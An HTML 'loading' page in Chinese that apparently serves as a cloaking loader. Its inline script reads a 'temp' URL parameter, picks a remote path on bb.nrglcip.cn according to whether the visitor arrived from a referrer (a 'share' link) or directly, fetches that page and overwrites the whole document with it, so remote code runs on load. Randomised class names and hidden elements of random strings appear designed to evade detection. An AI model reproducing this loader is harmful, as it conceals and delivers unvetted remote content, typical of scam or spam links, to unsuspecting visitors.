<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PmISMGyf {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PmISMGyf .oTnMSA0EYZT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PmISMGyf .content {
            line-height: 50px;
            text-align: center
        }

        .PmISMGyf .img {
            width: 100%
        }

        .PmISMGyf .jJ16QDF {
            text-align: center
        }

        .PmISMGyf .jJ16QDF span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PmISMGyf .jJ16QDF span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PmISMGyf .jJ16QDF span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PmISMGyf .jJ16QDF span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PmISMGyf .jJ16QDF span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PmISMGyf .jJ16QDF span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PmISMGyf .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JR6BfCFOSX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Jcihcrp = JR6BfCFOSX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Jcihcrp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Jcihcrp +".html?a=share";
		}
		
        qjnHCH=url+"#"+new Date().getTime();
        qjnHCH && function() {
            $.get(qjnHCH, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>wTyiboCgnuf2ljwzKlAsysnMQQ1pGZvQQ1QwDLxow7D42oyqWZZepdR12</div>
<b style='display:none' >uNei3kXghCpXvks0G6fWXS1OOU2VYlJHVj93MXOecPgIcKPK</b>
<b style='display:none' >uNei3kXghCpXvks0G6fWXS1OOU2VYlJHVj93MXOecPgIcKPK</b>
<a  href='#' style='display:none'>toePqCT2aagNl8czwEH1wbYUO0Yfk4p79Dg</a>
<span style='display:none'>XwHfnz7tsMA</span>
<li style='display:none' >XlRYs6IrFRVpABprrYGGB2zMEEVvbXzZ9Z6kNHQ09dnyDEAqQuCudZ5GZNxyhGqlbM</li>
<img  src='' style='display:none'>
<div style='display:none'>wTyiboCgnuf2ljwzKlAsysnMQQ1pGZvQQ1QwDLxow7D42oyqWZZepdR12</div><div class="PmISMGyf">
    <div class="oTnMSA0EYZT">
        <div class="jJ16QDF">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>HUTGinIu285xBAcVfypf0k5p7y8aldhSvbLQxQFzmwUexQxyDO2xvB36ZNI</span>
<img  src='' style='display:none'>
<h1 style='display:none' >YwWJsSJi7ncc9p7YRsZt23Q3WhgHHFBogsPMAFJcF0X71P653y4Ronyt2wxX4WoG5jRgbjNTJ94UGxtr8sDlhW5PDZyC1z5RMJH2</h1>
<h1 style='display:none' >YwWJsSJi7ncc9p7YRsZt23Q3WhgHHFBogsPMAFJcF0X71P653y4Ronyt2wxX4WoG5jRgbjNTJ94UGxtr8sDlhW5PDZyC1z5RMJH2</h1>
<ul style='display:none' >Daz5OUUNtawd5izE2</ul></body>
</html>